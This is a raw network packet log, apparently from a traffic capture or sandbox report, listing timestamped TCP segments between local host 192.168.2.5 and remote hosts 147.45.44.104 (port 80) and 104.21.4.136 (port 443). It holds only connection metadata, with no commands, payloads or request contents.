Sep 27, 2024 00:15:16.082623005 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.084733963 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.084861994 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.085575104 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.085635900 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.085767984 CEST	443	49712	104.21.4.136	192.168.2.5
Sep 27, 2024 00:15:16.085905075 CEST	443	49712	104.21.4.136	192.168.2.5
Sep 27, 2024 00:15:16.085953951 CEST	49712	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:15:16.086946964 CEST	49712	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:15:16.086971045 CEST	443	49712	104.21.4.136	192.168.2.5
Sep 27, 2024 00:15:16.086987972 CEST	49712	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:15:16.086996078 CEST	443	49712	104.21.4.136	192.168.2.5
Sep 27, 2024 00:15:16.089046955 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.089060068 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.089103937 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.089106083 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.089118958 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.089168072 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.092442989 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.092458963 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.092474937 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.092499018 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.092505932 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.092514992 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.092534065 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.092580080 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.092658043 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.092672110 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.092685938 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.092701912 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.092716932 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.092725992 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.092796087 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.093446970 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.093461037 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.093476057 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.093489885 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.093509912 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.093513012 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.093552113 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.094167948 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.094252110 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.094266891 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.094279051 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.094314098 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.094403982 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.094419956 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.094455957 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.095563889 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.095578909 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.095593929 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.095618010 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.095699072 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.095714092 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.095737934 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.095968008 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.095983028 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.095998049 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.096007109 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.096014977 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.096029043 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.096031904 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.096061945 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.096901894 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.096929073 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.096942902 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.096956015 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.096971989 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.096982002 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.097007990 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.097423077 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.097436905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.097450972 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.097465038 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.097476006 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.097491026 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.098083019 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.098267078 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.098267078 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.098445892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.098567009 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.098612070 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.100411892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.100446939 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.100469112 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.100558996 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.100573063 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.100617886 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.100617886 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.101460934 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.101504087 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.101506948 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.101577997 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.101593018 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.101638079 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.101639986 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.101684093 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.101818085 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.102008104 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.102021933 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.102046967 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.102073908 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.102088928 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.102102995 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.102118969 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.102144957 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.103075027 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.103197098 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.103210926 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.103225946 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.103240967 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.103247881 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.103296041 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.104161978 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.104218006 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.104228020 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.104310989 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.104324102 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.104336977 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.104351044 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.104365110 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.104366064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.104397058 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.104417086 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.105259895 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.105273008 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.105324030 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.105380058 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.105392933 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.105405092 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.105418921 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.105429888 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.105457067 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.106280088 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.106349945 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.106398106 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.106651068 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.107590914 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.107636929 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.107661963 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.107675076 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.107757092 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.108309984 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.108321905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.108334064 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.108385086 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.108845949 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.108870029 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.108882904 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.108894110 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.108897924 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.108907938 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.108920097 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.108927965 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.108963013 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.108969927 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.108980894 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109009027 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109010935 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.109026909 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109039068 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109049082 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109060049 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109071016 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109071970 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.109091043 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.109113932 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.109119892 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109133005 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109169960 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.109874010 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109884977 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109896898 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109920979 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.109946966 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109955072 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.109961987 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.109976053 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110014915 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.110198021 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110209942 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110222101 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110243082 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.110270977 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.110296965 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110308886 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110320091 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110361099 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.110852003 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110862017 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110868931 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110877991 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110913038 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.110930920 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110941887 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110953093 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110964060 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.110975027 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.110990047 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.111144066 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.111155987 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.111186981 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.111217976 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.111229897 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.111242056 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.111259937 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.111273050 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.111284018 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.111921072 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.111932039 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.111943007 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.111954927 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.111993074 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.112005949 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.112207890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112220049 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112231016 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112241983 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112266064 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.112312078 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.112323046 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112334967 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112344980 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112356901 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112369061 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112373114 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.112402916 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.112622023 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112658024 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112668991 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112680912 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.112699032 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.113043070 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113055944 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113066912 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113080025 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.113105059 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.113174915 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113188028 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113198996 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113210917 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113229036 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.113249063 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.113260031 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113272905 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113285065 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113297939 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113311052 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.113318920 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113321066 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.113334894 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.113360882 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.114815950 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.114834070 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.114846945 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.114906073 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.114906073 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.114937067 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.114949942 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.114960909 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.114974022 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.115001917 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.115019083 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.115133047 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117243052 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117255926 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117268085 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117288113 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117300034 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117311001 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117315054 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.117324114 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117352009 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.117372036 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.117480040 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117496014 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117507935 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117518902 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117532015 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117548943 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.117578983 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.117588997 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117600918 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117613077 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117635012 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.117655993 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.117677927 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117877007 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117887974 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117899895 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117925882 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117927074 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.117940903 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117954969 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117961884 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.117966890 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.117991924 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.118016958 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.118093967 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.118105888 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.118117094 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.118129015 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.118139982 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.118150949 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.118151903 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.118175983 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.118191004 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.118346930 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.118359089 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.118371010 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.118402004 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.119524002 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119569063 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119580030 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119596958 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.119610071 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.119674921 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119688034 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119699001 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119710922 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119728088 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.119745970 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.119750977 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119764090 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119776011 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119803905 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.119883060 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119895935 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119906902 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119918108 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119923115 CEST	49711	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:16.119930983 CEST	80	49711	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:16.119942904 CEST	80	49711	147.45.44.104	192.168.2.5
